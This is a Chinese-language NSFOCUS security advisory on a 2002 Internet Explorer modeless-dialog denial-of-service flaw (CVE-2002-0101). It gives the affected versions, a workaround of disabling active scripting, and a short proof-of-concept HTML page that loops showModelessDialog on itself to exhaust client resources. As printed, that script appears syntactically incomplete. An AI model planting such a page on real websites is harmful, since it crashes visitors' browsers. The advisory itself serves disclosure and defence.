首页 -> 安全研究

安全研究

安全漏洞
Microsoft IE无模式对话框拒绝服务攻击漏洞

发布日期:2002-01-07
更新日期:2002-01-11

受影响系统:
Microsoft Internet Explorer 5.5
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft Internet Explorer 5.5SP1
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft Internet Explorer 5.5SP2
    - Microsoft Windows Terminal Services
    - Microsoft Windows Terminal Server 4.0
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows ME
    - Microsoft Windows Enterprise Server 4.0
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft Internet Explorer 6.0
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
描述:
BUGTRAQ  ID: 3789
CVE(CAN) ID: CVE-2002-0101

Microsoft IE是与Windows操作系统捆绑在一起的流行的Web浏览器。无模式对话框(modeless
dialogs)的特点是当用户切换到其它应用程序时,它也会照常显示。

Microsoft IE在处理无模式对话框时存在漏洞,可以使恶意网站对客户机造成拒绝服务攻击。

当用户访问一个恶意网站时,如果HTML页面中包含了无模式方法的对话框并且在该对话框里面显示此页面,这种情况下IE就会进入无止境地循环,从而耗尽系统资源。


<*来源:Lance Hitchcock Jr. (whizack@attbi[dot]com)
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2002-01/0058.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Lance Hitchcock Jr. (whizack@attbi.com)提供了如下测试方法:

把以下的代码加入到名为“exploit.html”的HTML页面中:

<html>
<head>
<script type="javascript">
function exploit() {
while(1) {
showModelessDialog("exploit.html");
}
</script>
</head>
<body onLoad="exploit">
</body>
</html>

当用户访问exploit.html时,客户机就会因耗尽资源而崩溃。

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 设置IE,禁止Java脚本和活动脚本的执行。
  选择:“工具”->“Internet 选项...”->“安全”->“Internet”(或者其他区域,例如“本地Intranet”、“受信任的站点”)
  点击“自定义级别”,在“安全设置”中选择“脚本”->“活动脚本”,将其属性改为“禁用”,按“确定”保存设置。

厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

浏览次数:3384
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障